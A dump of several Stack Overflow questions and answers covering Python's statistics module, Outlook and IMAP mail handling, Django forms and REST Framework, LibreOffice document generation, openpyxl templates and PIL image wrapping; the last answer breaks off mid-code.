AssertionError: negative sum of square deviations | 38,744,648 | <p>As part of a larger project, I am writing a function that takes in a dict of dicts of ints and returns a dict with each "outer" key linked to a tuple of the mean and standard deviation of that sub dictionary (i.e. <code>(mean(dict[key1]), stdev(dict[key1]))</code> ). I am operating on a large dataset (the source file is a 2.8 GB csv file) and am getting an Assertion Error while calculating the standard deviation of one of the sub dicts. </p>
<p>While I will (and currently am) tracking down the sub dict that caused the error below, I'm curious about what general situation could cause it so I can try to avoid it if it happens further into my dataset.</p>
<p>The error message I receive is: </p>
<p><code>AssertionError: negative sum of square deviations: -3734262324235.697754</code> </p>
<p>from the code:</p>
<pre><code>import statistics as stat
try: #Check for single value error
std = stat.stdev(val)
except stat.StatisticsError:
std = 0
</code></pre>
| 1 | 2016-08-03T13:10:28Z | 38,745,780 | <p>The code in <code>statiscs.py</code> is pure Python - you seem to be a victim of a weird overflow error in the Fraction class, when processing the internal "sum of quares) <code>statistics._ss</code> function. </p>
<p>I think the best thing you can do now is to isntrument the<code>_ss</code> function in the <code>statistics.py</code> file itself with an "if" and a call to <code>pdb.set_trace</code> to find interactively which data is causing the errors (there is a comment in the code that this part is subject to rounding errors). It calculates a fraction that shuld be zero - but for rounding errors, and squares that fraction. But upon squaring, the already large denominator is squared itself - which is probably triggering a bug inside Python's Fraction, and returning an extremely large value when it should be just close to zero.</p>
<p>Such an "if" clause can allow you to (1) bypass the error condition and run your code to the end, forcing the value to zero when the error is found; (2) note down the values that cause the error, and report that as a bug to the Python language itself.</p>
| 2 | 2016-08-03T13:59:57Z | [
"python",
"python-3.x",
"dictionary",
"statistics",
"standard-deviation"
] |
How do I search for a specific Outlook email in python | 38,744,747 | <p>I have the following code which works, it can read the most recent Email in my outlook inbox and print the body of that message. However, I want to be able to specify a static Email address, and return all of the messages from that person. How would I change the code to do that?</p>
<pre class="lang-python prettyprint-override"><code>outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")
inbox = outlook.GetDefaultFolder(6)
messages = inbox.Items
message = messages.Getlast
body_content = message.body
print body_content
</code></pre>
<p>I figured it would be as easy as changing 'messages.Getlast' to something like 'messages.Get('Email address here') but no luck with that.</p>
<p>Thanks in advance for any help.</p>
| 0 | 2016-08-03T13:15:19Z | 38,746,159 | <p>You have already a script that allow you to obtain the list of message in a folder :</p>
<pre><code>outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")
inbox = outlook.GetDefaultFolder(6)
messages = inbox.Items
</code></pre>
<p>Once you got all the messages, you just have to check if the message sender is the same :</p>
<pre><code>sender = "my_sender"
sender = sender.lower()
for message in messages:
if sender in message.sender.lower():
# This message was send by sender
print message.body
</code></pre>
<p>That code should print the body of every <code>message in messages</code> where <code>sender</code> is contained in <code>message.sender</code>.</p>
<p>I have add the <code>lower()</code> function to avoid problems with caps. You might want to remove it.</p>
<p>Hope it will help.</p>
| 0 | 2016-08-03T14:15:55Z | [
"python",
"email",
"outlook",
"python-2.x"
] |
django add foreign key value after form submit | 38,744,752 | <p>After a <code>ModelForm</code> has been submitted, how can I add a foreign key relation so that it validates?</p>
<p><code>models.py</code></p>
<pre><code>class Comment(models.Model):
id = models.AutoField(primary_key=True)
activity = models.ForeignKey(Activity)
submitter = models.ForeignKey(User)
creation_date = models.DateTimeField(auto_now_add=True)
content = models.TextField()
</code></pre>
<p><code>forms.py</code></p>
<pre><code>class CommentForm(forms.ModelForm):
content = forms.CharField(widget=forms.Textarea)
class Meta:
model = Comment
</code></pre>
<p><code>views.py</code></p>
<pre><code>def index(request, id=None):
activity_instance = Activity.objects.get(pk=1)
submitter_instance = User.objects.get(id=1)
newComment = CommentForm(request.POST)
newComment.activity = activity_instance
newComment.submitter = submitter_instance
if newComment.is_valid(): # <-- false, which is the problem
</code></pre>
| 1 | 2016-08-03T13:15:28Z | 38,744,948 | <p>I think you are mixing up form instance with model instance. your <code>newComment</code> is a form, assigning other objects as a form attribute will not make the form saving the foreign key(not sure where did you find this usage), because all form data is saved in <code>form.data</code>, which is a dict like data structure.</p>
<p>I'm not sure what does your form look like because you didn't exclude the foreign keys so they should be rendered as dropdowns and you could select them. If you don't want the user to select the foreign key but choose to assign the values as you currently do, you should exclude them in the form so <code>form.is_valid()</code> would pass:</p>
<pre><code>class CommentForm(forms.ModelForm):
content = forms.CharField(widget=forms.Textarea)
class Meta:
model = Comment
exclude = ('activity', 'submitter')
</code></pre>
<p>views.py</p>
<pre><code>def index(request, id=None):
activity_instance = Activity.objects.get(pk=1)
submitter_instance = User.objects.get(id=1)
comment_form = CommentForm(request.POST)
if comment_form.is_valid():
new_comment = comment_form.save(commit=False)
new_comment.activity = activity_instance
new_comment.submitter = submitter_instance
new_comment.save()
</code></pre>
<p>Django doc <a href="https://docs.djangoproject.com/en/1.9/topics/forms/modelforms/#the-save-method" rel="nofollow">about <code>save()</code> method</a>.</p>
| 4 | 2016-08-03T13:25:02Z | [
"python",
"django"
] |
Django server crashes with exit codes 139, 77 | 38,744,818 | <h2>Foreword</h2>
<p>Okay, I have a really complex perfomance issue. I'm building a content managment system and one of the features should be generating tons of <code>.docx</code> files with different templates. I started with <a href="https://pythonhosted.org/django-webodt/quickstart.html" rel="nofollow">Webodt</a> + Abiword. But then templates got too complex, so I had to swith my backend to <a href="http://templated-docs.readthedocs.io/en/latest/index.html" rel="nofollow">Templated-docs</a> + LibreOffice. So this is where my problems started. </p>
<p>I use:</p>
<ul>
<li>Python 2.7.12</li>
<li>Django==1.8.2</li>
<li>templated-docs==0.2.9</li>
<li>LibreOffice 5.1.5.2</li>
<li>Ubuntu 16.04</li>
</ul>
<h2>The actual problem</h2>
<p>I have an API which handles <code>.docx</code> render. I will show one of views, as an example, they are pretty similar:</p>
<pre><code>@permission_classes((permissions.IsAdminUser,))
class BookDocxViewSet(mixins.RetrieveModelMixin, viewsets.GenericViewSet):
def retrieve(self, request, *args, **kwargs):
queryset = Pupils.objects.get(id=kwargs['pk'])
serializer = StudentSerializer(queryset)
context = dict(serializer.data)
doc = fill_template('crm/docs/book.ott', context, output_format='docx')
p = u'docs/books/%s/%s_%s_%s.doc' % (datetime.now().date(), context[u'surname'], context[u'name'], datetime.now().date())
with open(doc, 'rb') as f:
content = f.read()
path = default_storage.save(p, ContentFile(content))
f.close()
return response.Response(u'/media/' + path)
</code></pre>
<p>When I call it the first time, it creates a <code>.docx</code> file, saves it to my <code>default_storage</code> and then returns me a download link. But when I try to do it again, of do it with another method (which works with another template and context), my server just crashes without any logs. The last thing I see is either </p>
<ol>
<li><code>Process finished with exit code 77</code> if I call it with a little delay (more then one second)</li>
<li><code>Process finished with exit code 139 (interrupted by signal 11: SIGSEGV)</code> if call my method for the second time right away (in less than one second)</li>
</ol>
<p>I tried to use debuger -- it said that my server crashes on this line:</p>
<p><code>doc = fill_template('crm/docs/book.ott', context, output_format='docx')</code></p>
<p>I bet what happens is:</p>
<ol>
<li>When I call my method the first time <code>templated_docs</code> starts LibreOffice backend, and then <strong>does not stop it</strong></li>
<li>When I call my method the second time <code>templated_docs</code> tries to start LibreOffice backend again, but it is already busy.</li>
</ol>
<h2>Questions</h2>
<ol>
<li><strike>How do I debug LibreOffice to prove / refute my theory?</strike> <em>(I guess I need to debug <code>templated_docs</code> instead)</em></li>
<li>Why do I get different exit codes depending of delay?</li>
<li>Is it enough base to oppen an <a href="https://github.com/alexmorozov/templated-docs/issues" rel="nofollow">issue</a> on GitHub?</li>
<li>How do I fix that?</li>
</ol>
<hr>
<h2>UPD</h2>
<p>It is not an issue of REST Framework or not using <code>FileResponce()</code>.
I already tried to test it with regular view.</p>
<pre><code>def get_document(request, *args, **kwargs):
context = Pupils.objects.get(id=kwargs['pk']).__dict__
doc = fill_template('crm/docs/book.ott', context, output_format='docx')
p = u'%s_%s_%s' % (context[u'surname'], context[u'name'], datetime.now().date())
return FileResponse(doc, p)
</code></pre>
<p>And the problem is same.</p>
<hr>
<h2>UPD 2</h2>
<p>Okay. This line is chashing my server:</p>
<pre><code># pylokit/lokit.py
self.lokit = lo.libreofficekit_hook(six.b(lo_path))
</code></pre>
| 1 | 2016-08-03T13:18:48Z | 38,749,701 | <p>Okay, that was a bug in <code>templated_docs</code>. I was right, it happens because <code>templated_docs</code> is trying to start LibreOffice twice. As it said in <code>pylokit</code> <a href="https://github.com/xrmx/pylokit#examples" rel="nofollow">documentation</a>:</p>
<blockquote>
<p>The use of _exit() instead of default exit() is required because in
some circumstances LibreOffice segfaults on process exit.</p>
</blockquote>
<p>It means the process that used <code>pylockt</code> should be killed after. But we cannot kill Django server. So I decided to use multiprocessing:</p>
<pre><code># templated_docs/__init__.py
if source_extension[1:] != output_format:
lo_path = getattr(
settings,
'TEMPLATED_DOCS_LIBREOFFICE_PATH',
'/usr/lib/libreoffice/program/')
def f(conn):
with Office(lo_path) as lo:
conv_file = NamedTemporaryFile(delete=False,
suffix='.%s' % output_format)
with lo.documentLoad(str(dest_file.name)) as doc:
doc.saveAs(conv_file.name)
os.unlink(dest_file.name)
conn.send(conv_file.name)
conn.close()
parent_conn, child_conn = Pipe()
p = Process(target=f, args=(child_conn,))
p.start()
conv_file_name = parent_conn.recv()
p.join()
return conv_file_name
else:
return dest_file.name
</code></pre>
<p>I oppened an <a href="https://github.com/alexmorozov/templated-docs/issues/3" rel="nofollow">issue</a> and made a <a href="https://github.com/alexmorozov/templated-docs/pull/4" rel="nofollow">pull request</a>.</p>
| 1 | 2016-08-03T17:03:04Z | [
"python",
"django",
"libreoffice"
] |
Python imaplib doesnt mark messages as unseen | 38,744,885 | <p>I am working on a function that collects data from email and has a switch to mark messages as unseen. During development it started to fail I don't know why. I've looked it up in documentation, I've searched stackoverflow (got to <a href="http://stackoverflow.com/questions/17367611/python-imaplib-mark-email-as-unread-or-unseen">this</a> thread, but it didn't help). Anyway. This is the code:</p>
<pre><code> mail = imaplib.IMAP4_SSL('imap.gmail.com', '993')
mail.login(settings.INVOICES_LOGIN, settings.INVOICES_PASSWORD)
mail.select('inbox')
result, data = mail.uid('search', '(UNSEEN)', 'X-GM-RAW',
'SUBJECT: "{0}" FROM: "{1}"'.format(attachment_subject, attachment_from))
uids = data[0].split()
for uid in uids:
result, data = mail.uid('fetch', uid, '(RFC822)')
m = email.message_from_string(data[0][1])
if m.get_content_maintype() == 'multipart':
for part in m.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
if re.match(attachment_filename_re, part.get_filename()):
attachments.append({'uid': uid, 'data': part.get_payload(decode=True)})
if set_not_read:
mail.store(uid, '-FLAGS', '(\Seen)')
</code></pre>
<p>I've debugged it, I am sure that with this flag the <code>mail.store(uid, '-FLAGS', '(\Seen)')</code> part is entered, I've also tried switching to <code>\SEEN</code> and <code>\Seen</code> instead of (\Seen).</p>
<p>EDIT:</p>
<p>What I'm trying to do is to make a script that allows user to mark email as <code>unseen</code> (not read), this is reset the <code>Seen</code> flag, and not to allow it to mark an email as <code>seen</code> (read).</p>
| 1 | 2016-08-03T13:21:50Z | 38,745,198 | <p>I believe you want</p>
<pre><code>mail.store(uid, '+FLAGS', '(\\Seen)')
</code></pre>
<p>I think what you're doing right now is <em>removing</em> the seen flag. But I'll look in the RFC to be sure.</p>
<p><strong>Edit:</strong> Yup. That's what the <a href="https://tools.ietf.org/html/rfc3501#page-59" rel="nofollow">RFC says</a></p>
<pre><code>-FLAGS <flag list>
Remove the argument from the flags for the message. The new
value of the flags is returned as if a FETCH of those flags was
done.
</code></pre>
<p>Other bits that you may find relevant:</p>
<pre><code>The currently defined data items that can be stored are:
FLAGS <flag list>
Replace the flags for the message (other than \Recent) with the
argument. The new value of the flags is returned as if a FETCH
of those flags was done.
FLAGS.SILENT <flag list>
Equivalent to FLAGS, but without returning a new value.
+FLAGS <flag list>
Add the argument to the flags for the message. The new value
of the flags is returned as if a FETCH of those flags was done.
+FLAGS.SILENT <flag list>
Equivalent to +FLAGS, but without returning a new value.
-FLAGS <flag list>
Remove the argument from the flags for the message. The new
value of the flags is returned as if a FETCH of those flags was
done.
-FLAGS.SILENT <flag list>
Equivalent to -FLAGS, but without returning a new value.
</code></pre>
| 1 | 2016-08-03T13:34:39Z | [
"python",
"imaplib"
] |
Preserve formatting when modifying an Excel (xlsx) file with Python | 38,744,952 | <p>Is there any Python module out there that can be used to create an Excel XLSX file replicating the format from a template?</p>
| -2 | 2016-08-03T13:25:27Z | 38,745,135 | <p>You can use openpyxl to open a template file and then populate it with data and save it as something else to preserve the original template for use later. Check out this answer: <a href="http://stackoverflow.com/questions/38616207/store-data-which-is-an-output-of-python-program-in-excel-file/38616604#38616604">Working with Excel In Python</a></p>
| 0 | 2016-08-03T13:32:23Z | [
"python",
"excel"
] |
Preserve formatting when modifying an Excel (xlsx) file with Python | 38,744,952 | <p>Is there any Python module out there that can be used to create an Excel XLSX file replicating the format from a template?</p>
| -2 | 2016-08-03T13:25:27Z | 38,745,156 | <p>As far as I understood <code>openpyxl</code> supports this. This is example from <a href="http://openpyxl.readthedocs.io/en/default/usage.html#write-a-workbook-from-xltx-as-xlsx" rel="nofollow">docs</a>:</p>
<pre><code>from openpyxl import load_workbook
wb = load_workbook('sample_book.xltx')
ws = wb.active
ws['D2'] = 42
wb.save('sample_book.xlsx')
</code></pre>
| 0 | 2016-08-03T13:33:12Z | [
"python",
"excel"
] |
Wrap image around a circle | 38,745,020 | <p>What I'm trying to do in this example is wrap an image around a circle, like below.</p>
<p><a href="http://i.stack.imgur.com/0vWEI.png"><img src="http://i.stack.imgur.com/0vWEI.png" alt="original"></a></p>
<p><a href="http://i.stack.imgur.com/B63uj.png"><img src="http://i.stack.imgur.com/B63uj.png" alt="wrapped"></a></p>
<p>To wrap the image I simply calculated the x,y coordinates using trig.
The problem is the calculated X and Y positions are rounded to make them integers. This causes the blank pixels in seen the wrapped image above. The x,y positions have to be an integer because they are positions in lists.</p>
<p>I've done this again in the code following but without any images to make things easier to see. All I've done is create two arrays with binary values, one array is black the other white, then wrapped one onto the other.</p>
<p>The output of the code is. </p>
<p><a href="http://i.stack.imgur.com/9JDmM.png"><img src="http://i.stack.imgur.com/9JDmM.png" alt="example"></a></p>
<pre><code>import math as m
from PIL import Image # only used for showing output as image
width = 254.0
height = 24.0
Ro = 40.0
img = [[1 for x in range(int(width))] for y in range(int(height))]
cir = [[0 for x in range(int(Ro * 2))] for y in range(int(Ro * 2))]
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("1", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.show()
increment = m.radians(360 / width)
rad = Ro - 0.5
for i, row in enumerate(img):
hyp = rad - i
for j, column in enumerate(row):
alpha = j * increment
x = m.cos(alpha) * hyp + rad
y = m.sin(alpha) * hyp + rad
# put value from original image to its position in new image
cir[int(round(y))][int(round(x))] = img[i][j]
shom_im(cir)
</code></pre>
<p>I later found out about the Midpoint Circle Algorithm but I had worse result with that</p>
<p><a href="http://i.stack.imgur.com/CVbUn.png"><img src="http://i.stack.imgur.com/CVbUn.png" alt="midpoint"></a></p>
<pre><code>from PIL import Image # only used for showing output as image
width, height = 254, 24
ro = 40
img = [[(0, 0, 0, 1) for x in range(int(width))]
for y in range(int(height))]
cir = [[(0, 0, 0, 255) for x in range(int(ro * 2))] for y in range(int(ro * 2))]
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("RGBA", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.show()
def putpixel(x0, y0):
global cir
cir[y0][x0] = (255, 255, 255, 255)
def drawcircle(x0, y0, radius):
x = radius
y = 0
err = 0
while (x >= y):
putpixel(x0 + x, y0 + y)
putpixel(x0 + y, y0 + x)
putpixel(x0 - y, y0 + x)
putpixel(x0 - x, y0 + y)
putpixel(x0 - x, y0 - y)
putpixel(x0 - y, y0 - x)
putpixel(x0 + y, y0 - x)
putpixel(x0 + x, y0 - y)
y += 1
err += 1 + 2 * y
if (2 * (err - x) + 1 > 0):
x -= 1
err += 1 - 2 * x
for i, row in enumerate(img):
rad = ro - i
drawcircle(int(ro - 1), int(ro - 1), rad)
shom_im(cir)
</code></pre>
<p>Can anybody suggest a way to eliminate the blank pixels? </p>
| 8 | 2016-08-03T13:27:57Z | 38,745,222 | <p>I think what you need is a noise filter. There are many implementations from which I think Gaussian filter would give a good result. You can find a list of filters <a href="http://pillow.readthedocs.io/en/3.1.x/reference/ImageFilter.html" rel="nofollow">here</a>. If it gets blurred too much:</p>
<ul>
<li>keep your first calculated image</li>
<li>calculate filtered image</li>
<li>copy fixed pixels from filtered image to first calculated image</li>
</ul>
<p>Here is a crude average filter written by hand:</p>
<pre><code>cir_R = int(Ro*2) # outer circle 2*r
inner_r = int(Ro - 0.5 - len(img)) # inner circle r
for i in range(1, cir_R-1):
for j in range(1, cir_R-1):
if cir[i][j] == 0: # missing pixel
dx = int(i-Ro)
dy = int(j-Ro)
pix_r2 = dx*dx + dy*dy # distance to center
if pix_r2 <= Ro*Ro and pix_r2 >= inner_r*inner_r:
cir[i][j] = (cir[i-1][j] + cir[i+1][j] + cir[i][j-1] +
cir[i][j+1])/4
shom_im(cir)
</code></pre>
<p>and the result:</p>
<p><a href="http://i.stack.imgur.com/4dhAF.png" rel="nofollow"><img src="http://i.stack.imgur.com/4dhAF.png" alt="enter image description here"></a></p>
<p>This basically scans between two ranges checks for missing pixels and replaces them with average of 4 pixels adjacent to it. In this black white case it is all white.</p>
<p>Hope it helps!</p>
| 4 | 2016-08-03T13:35:31Z | [
"python",
"python-3.x",
"python-imaging-library"
] |
Wrap image around a circle | 38,745,020 | <p>What I'm trying to do in this example is wrap an image around a circle, like below.</p>
<p><a href="http://i.stack.imgur.com/0vWEI.png"><img src="http://i.stack.imgur.com/0vWEI.png" alt="original"></a></p>
<p><a href="http://i.stack.imgur.com/B63uj.png"><img src="http://i.stack.imgur.com/B63uj.png" alt="wrapped"></a></p>
<p>To wrap the image I simply calculated the x,y coordinates using trig.
The problem is the calculated X and Y positions are rounded to make them integers. This causes the blank pixels in seen the wrapped image above. The x,y positions have to be an integer because they are positions in lists.</p>
<p>I've done this again in the code following but without any images to make things easier to see. All I've done is create two arrays with binary values, one array is black the other white, then wrapped one onto the other.</p>
<p>The output of the code is. </p>
<p><a href="http://i.stack.imgur.com/9JDmM.png"><img src="http://i.stack.imgur.com/9JDmM.png" alt="example"></a></p>
<pre><code>import math as m
from PIL import Image # only used for showing output as image
width = 254.0
height = 24.0
Ro = 40.0
img = [[1 for x in range(int(width))] for y in range(int(height))]
cir = [[0 for x in range(int(Ro * 2))] for y in range(int(Ro * 2))]
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("1", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.show()
increment = m.radians(360 / width)
rad = Ro - 0.5
for i, row in enumerate(img):
hyp = rad - i
for j, column in enumerate(row):
alpha = j * increment
x = m.cos(alpha) * hyp + rad
y = m.sin(alpha) * hyp + rad
# put value from original image to its position in new image
cir[int(round(y))][int(round(x))] = img[i][j]
shom_im(cir)
</code></pre>
<p>I later found out about the Midpoint Circle Algorithm but I had worse result with that</p>
<p><a href="http://i.stack.imgur.com/CVbUn.png"><img src="http://i.stack.imgur.com/CVbUn.png" alt="midpoint"></a></p>
<pre><code>from PIL import Image # only used for showing output as image
width, height = 254, 24
ro = 40
img = [[(0, 0, 0, 1) for x in range(int(width))]
for y in range(int(height))]
cir = [[(0, 0, 0, 255) for x in range(int(ro * 2))] for y in range(int(ro * 2))]
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("RGBA", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.show()
def putpixel(x0, y0):
global cir
cir[y0][x0] = (255, 255, 255, 255)
def drawcircle(x0, y0, radius):
x = radius
y = 0
err = 0
while (x >= y):
putpixel(x0 + x, y0 + y)
putpixel(x0 + y, y0 + x)
putpixel(x0 - y, y0 + x)
putpixel(x0 - x, y0 + y)
putpixel(x0 - x, y0 - y)
putpixel(x0 - y, y0 - x)
putpixel(x0 + y, y0 - x)
putpixel(x0 + x, y0 - y)
y += 1
err += 1 + 2 * y
if (2 * (err - x) + 1 > 0):
x -= 1
err += 1 - 2 * x
for i, row in enumerate(img):
rad = ro - i
drawcircle(int(ro - 1), int(ro - 1), rad)
shom_im(cir)
</code></pre>
<p>Can anybody suggest a way to eliminate the blank pixels? </p>
| 8 | 2016-08-03T13:27:57Z | 38,819,423 | <p>You are having problems filling up your circle because you are approaching this from the wrong way â quite literally.</p>
<p>When mapping <em>from</em> a source <em>to</em> a target, you need to fill your <em>target</em>, and map each translated pixel from this into the <em>source</em> image. Then, there is no chance at all you miss a pixel, and, equally, you will never draw (nor lookup) a pixel more than once.</p>
<p>The following is a bit rough-and-ready, it only serves as a concept example. I first wrote some code to draw a filled circle, top to bottom. Then I added some more code to remove the center part (and added a variable <code>Ri</code>, for "inner radius"). This leads to a solid ring, where all pixels are only drawn once: top to bottom, left to right.</p>
<p><a href="http://i.stack.imgur.com/q6ekn.png" rel="nofollow"><img src="http://i.stack.imgur.com/q6ekn.png" alt="a solid ring"></a></p>
<p>How you exactly draw the ring is not actually important! I used trig at first because I thought of re-using the angle bit, but it can be done with Pythagorus' as well, and even with Bresenham's circle routine. All you need to keep in mind is that you iterate over the <em>target</em> rows and columns, not the <em>source</em>. This provides actual <code>x</code>,<code>y</code> coordinates that you can feed into the remapping procedure.</p>
<p>With the above done and working, I wrote the trig functions to translate <em>from</em> the coordinates I would put a pixel at <em>into</em> the original image. For this, I created a test image containing some text:</p>
<p><a href="http://i.stack.imgur.com/5sb4u.png" rel="nofollow"><img src="http://i.stack.imgur.com/5sb4u.png" alt="test image with text"></a></p>
<p>and a good thing that was, too, as in the first attempt I got the text twice (once left, once right) and mirrored â that needed a few minor tweaks. Also note the background grid. I added that to check if the 'top' and 'bottom' lines â the outermost and innermost circles â got drawn correctly.</p>
<p>Running my code with this image and <code>Ro</code>,<code>Ri</code> at 100 and 50, I get this result:</p>
<p><a href="http://i.stack.imgur.com/fIJco.png" rel="nofollow"><img src="http://i.stack.imgur.com/fIJco.png" alt="round test image"></a></p>
<p>You can see that the trig functions make it start at the rightmost point, move clockwise, and have the top of the image pointing outwards. All can be trivially adjusted, but this way it mimics the orientation that you want your image drawn.</p>
<p>This is the result with your iris-image, using <code>33</code> for the inner radius:</p>
<p><a href="http://i.stack.imgur.com/BUcjW.png" rel="nofollow"><img src="http://i.stack.imgur.com/BUcjW.png" alt="iris to eye mapping"></a></p>
<p>and here is a nice animation, showing the stability of the mapping:</p>
<p><a href="http://i.stack.imgur.com/uUcEZ.gif" rel="nofollow"><img src="http://i.stack.imgur.com/uUcEZ.gif" alt="aww bright light ahead!"></a></p>
<p>Finally, then, my code is:</p>
<pre><code>import math as m
from PIL import Image
Ro = 100.0
Ri = 50.0
# img = [[1 for x in range(int(width))] for y in range(int(height))]
cir = [[0 for x in range(int(Ro * 2))] for y in range(int(Ro * 2))]
# image = Image.open('0vWEI.png')
image = Image.open('this-is-a-test.png')
# data = image.convert('RGB')
pixels = image.load()
width, height = image.size
def shom_im(img): # for showing data as image
list_image = [item for sublist in img for item in sublist]
new_image = Image.new("RGB", (len(img[0]), len(img)))
new_image.putdata(list_image)
new_image.save("result1.png","PNG")
new_image.show()
for i in range(int(Ro)):
# outer_radius = Ro*m.cos(m.asin(i/Ro))
outer_radius = m.sqrt(Ro*Ro - i*i)
for j in range(-int(outer_radius),int(outer_radius)):
if i < Ri:
# inner_radius = Ri*m.cos(m.asin(i/Ri))
inner_radius = m.sqrt(Ri*Ri - i*i)
else:
inner_radius = -1
if j < -inner_radius or j > inner_radius:
# this is the destination
# solid:
# cir[int(Ro-i)][int(Ro+j)] = (255,255,255)
# cir[int(Ro+i)][int(Ro+j)] = (255,255,255)
# textured:
x = Ro+j
y = Ro-i
# calculate source
angle = m.atan2(y-Ro,x-Ro)/2
distance = m.sqrt((y-Ro)*(y-Ro) + (x-Ro)*(x-Ro))
distance = m.floor((distance-Ri+1)*(height-1)/(Ro-Ri))
# if distance >= height:
# distance = height-1
cir[int(y)][int(x)] = pixels[int(width*angle/m.pi) % width, height-distance-1]
y = Ro+i
# calculate source
angle = m.atan2(y-Ro,x-Ro)/2
distance = m.sqrt((y-Ro)*(y-Ro) + (x-Ro)*(x-Ro))
distance = m.floor((distance-Ri+1)*(height-1)/(Ro-Ri))
# if distance >= height:
# distance = height-1
cir[int(y)][int(x)] = pixels[int(width*angle/m.pi) % width, height-distance-1]
shom_im(cir)
</code></pre>
<p>The commented-out lines draw a solid white ring. Note the various tweaks here and there to get the best result. For instance, the <code>distance</code> is measured from the center of the ring, and so returns a low value for close to the center and the largest values for the outside of the circle. Mapping that directly back onto the target image would display the text with its top "inwards", pointing to the inner hole. So I inverted this mapping with <code>height - distance - 1</code>, where the <code>-1</code> is to make it map from <code>0</code> to <code>height</code> again.</p>
<p>A similar fix is in the calculation of <code>distance</code> itself; without the tweaks <code>Ri+1</code> and <code>height-1</code> either the innermost or the outermost row would not get drawn, indicating that the calculation is just one pixel off (which was exactly the purpose of that grid).</p>
| 4 | 2016-08-07T23:13:30Z | [
"python",
"python-3.x",
"python-imaging-library"
] |
Using Models in Django-Rest Framework | 38,745,067 | <p>I am new to Django-Rest Framework and I wanted to develop API calls.
I am currently using Mysql database so if I have to make changes in the database, do I have to write models in my project or Can I execute the raw data operation onto my database.</p>
<p>Like:
This is my urls.py file which contains a list of URLs and if any of the URL is hit
it directly calls to view function present in views.py file and rest I do the particular operation in that function, like connecting to MySQL database, executing SQL queries and returning JSON response to the front end.</p>
<p>Is this a good approach to making API calls? If not Please guide me.</p>
<p>Any advice or help will be appreciated.</p>
| 0 | 2016-08-03T13:29:40Z | 38,746,370 | <p>you don't <em>need</em> to use models, but you really should. django's ORM (the way it handles reading/writing to databases) functionality is fantastic and really useful. </p>
<p>if you're executing raw sql statements all the time, you either have a highly specific case where django's functions fail you, or you're using django inefficiently and should rethink why you're using django to begin with.</p>
| 2 | 2016-08-03T14:24:39Z | [
"python",
"django",
"django-rest-framework"
] |
Using Models in Django-Rest Framework | 38,745,067 | <p>I am new to Django-Rest Framework and I wanted to develop API calls.
I am currently using Mysql database so if I have to make changes in the database, do I have to write models in my project or Can I execute the raw data operation onto my database.</p>
<p>Like:
This is my urls.py file which contains a list of URLs and if any of the URL is hit
it directly calls to view function present in views.py file and rest I do the particular operation in that function, like connecting to MySQL database, executing SQL queries and returning JSON response to the front end.</p>
<p>Is this a good approach to making API calls? If not Please guide me.</p>
<p>Any advice or help will be appreciated.</p>
| 0 | 2016-08-03T13:29:40Z | 38,750,038 | <p>Django REST Framework is designed to work with Django Framework. And Django ORM is an integral part of Django Framework. Granted, that it is possible to use Django and DRF without using ORM, but you will be basically fighting against the framework instead of using the framework to help you. So, you have three basic approaches.</p>
<ol>
<li><p>If all you want is to develop RESTful APIs in python and pull data from an existing MySQL database or you don't have a database, but you want something simple. You can use something framework agnostic, like restless (<a href="http://restless.readthedocs.io/en/latest/" rel="nofollow">http://restless.readthedocs.io/en/latest/</a>) or even hug (<a href="https://github.com/timothycrosley/hug" rel="nofollow">https://github.com/timothycrosley/hug</a>)</p></li>
<li><p>If you do not have any existing data and you want a full blown web framework, you should consider using Django (I make my living as a Django dev, there is no shame in this) and embrace the ORM. In this case, DRF is one of the better REST frameworks for Django at the moment.</p></li>
<li><p>If you have existing database and are somehow stuck with using Django, there are some ways to use Django ORM with existing data, you should look at Django docs on the topic (<a href="https://docs.djangoproject.com/en/1.9/howto/legacy-databases/" rel="nofollow">https://docs.djangoproject.com/en/1.9/howto/legacy-databases/</a>)</p></li>
</ol>
| 0 | 2016-08-03T17:21:45Z | [
"python",
"django",
"django-rest-framework"
] |
Using Models in Django-Rest Framework | 38,745,067 | <p>I am new to Django-Rest Framework and I wanted to develop API calls.
I am currently using Mysql database so if I have to make changes in the database, do I have to write models in my project or Can I execute the raw data operation onto my database.</p>
<p>Like:
This is my urls.py file which contains a list of URLs and if any of the URL is hit
it directly calls to view function present in views.py file and rest I do the particular operation in that function, like connecting to MySQL database, executing SQL queries and returning JSON response to the front end.</p>
<p>Is this a good approach to making API calls? If not Please guide me.</p>
<p>Any advice or help will be appreciated.</p>
| 0 | 2016-08-03T13:29:40Z | 38,750,758 | <p>Why would you use Django without hitting the database with the ORM? Most of the times the ORM works as you'd expect, and even allow you to perform searches like this:</p>
<pre><code>class Foo(models.Model):
code = models.CharField(max_length=10, ...)
class Bar(models.Model):
code = models.CharField(max_length=10, ...)
foo = models.ForeignKey(Foo, ...)
</code></pre>
<p>And perform a query like this:</p>
<pre><code>Bar.objects.get(code='baz', foo_code='bat')
</code></pre>
<p>Which would be the same, but better, than:</p>
<pre><code>select bar.* from yourapp_bar bar inner join yourapp_foo foo on (bar.foo_id = foo.id) where bar.code = 'baz' and foo.code = 'bat'
</code></pre>
<p>Shorter and more maintainable.</p>
<p>Now, speaking about Django Rest Framework and Django in general: Although the latter modifications to both Django and DRF involve you cannot suddenly expect nested objects be created in the same moment the parent objects are (e.g. Foo is parent, while Bar is nested), as it happens in relation managers (Django) and create/update methods in the <code>ModelSerializer</code> class, you can still trust Django to save your time, effort, and life by using it instead of SQL.</p>
<p>I will give you an example with DRF. We will assume only Foo models are involved here. Which one would you prefer?</p>
<pre><code># yourapp.urls
from .views import UserViewSet
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
router.register(r'users', UserViewSet)
urlpatterns = router.urls
# yourapp.views
class FooViewSet(viewsets.ModelViewSet):
"""
A viewset that provides the standard actions for
a single foo element
"""
queryset = Foo.objects.all()
serializer_class = FooSerializer
# I am assuming you created the FooSerializer to map certain fields...
